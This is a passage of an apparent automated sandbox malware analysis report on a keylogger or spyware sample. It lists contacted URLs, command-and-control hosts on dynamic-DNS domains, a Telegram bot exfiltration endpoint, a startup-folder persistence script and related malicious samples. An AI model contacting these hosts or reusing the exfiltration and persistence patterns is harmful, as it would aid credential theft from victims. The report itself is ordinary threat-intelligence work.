                                            http://mail.standartasansor.comRegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://chrome.google.com/webstore?hl=enHRegSvcs.exe, 00000002.00000002.2974305954.0000000002E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.office.com/lBRegSvcs.exe, 00000002.00000002.2974305954.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003170000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.office.com/HRegSvcs.exe, 00000002.00000002.2974305954.0000000002E37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000008.00000002.2973433634.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://varders.kozow.com:8081Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://aborters.duckdns.org:8081Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://anotherarmy.dns.army:8081Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.org/qSancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000002.00000002.2974305954.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000313F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedSancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.microsRegSvcs.exe, 00000002.00000002.2984782399.0000000005F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.org/xml/Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      149.154.167.220
                                                                                      		api.telegram.orgUnited Kingdom
                                                                                      		62041TELEGRAMRUfalse
                                                                                      193.122.6.168
                                                                                      		checkip.dyndns.comUnited States
                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                      178.210.170.40
                                                                                      		mail.standartasansor.comTurkey
                                                                                      		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRtrue
                                                                                      104.21.64.1
                                                                                      		reallyfreegeoip.orgUnited States
                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1587865
                                                                                      Start date and time:2025-01-10 18:45:32 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 7m 59s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:10
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:AHSlIDftf1.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 52
                                                                                      • Number of non-executed functions: 299
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      12:46:35API Interceptor2323763x Sleep call for process: RegSvcs.exe modified
                                                                                      17:46:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      149.154.167.220eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          193.122.6.168SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          checkip.dyndns.comeLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          reallyfreegeoip.orgeLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.64.1
                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.96.1
                                                                                                          3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.16.1
                                                                                                          v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.16.1
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.80.1
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.21.80.1
                                                                                                          zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.96.1
                                                                                                          api.telegram.orgeLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          ORACLE-BMC-31898USMzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          TELEGRAMRUeLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                          • 149.154.167.99
                                                                                                          4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                          • 149.154.167.99
                                                                                                          B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRTeikwYB2tm.exeGet hashmaliciousDanaBotBrowse
                                                                                                          • 188.132.183.159
                                                                                                          TeikwYB2tm.exeGet hashmaliciousDanaBotBrowse
                                                                                                          • 188.132.183.159
                                                                                                          A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                                                          • 188.132.183.159
                                                                                                          vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                                                          • 188.132.183.159
                                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 78.135.74.199
                                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 78.135.115.141
                                                                                                          PO_63738373663838____________________________________________________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.132.193.46
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.132.193.46
                                                                                                          Scan_20241030.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 46.28.239.165
                                                                                                          dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.132.193.46

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adeLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.64.1
                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.64.1
                                                                                                          3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.64.1
                                                                                                          SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.64.1
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eeLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          grW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          grW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ID_Badge_Policy.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                          • 149.154.167.220

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

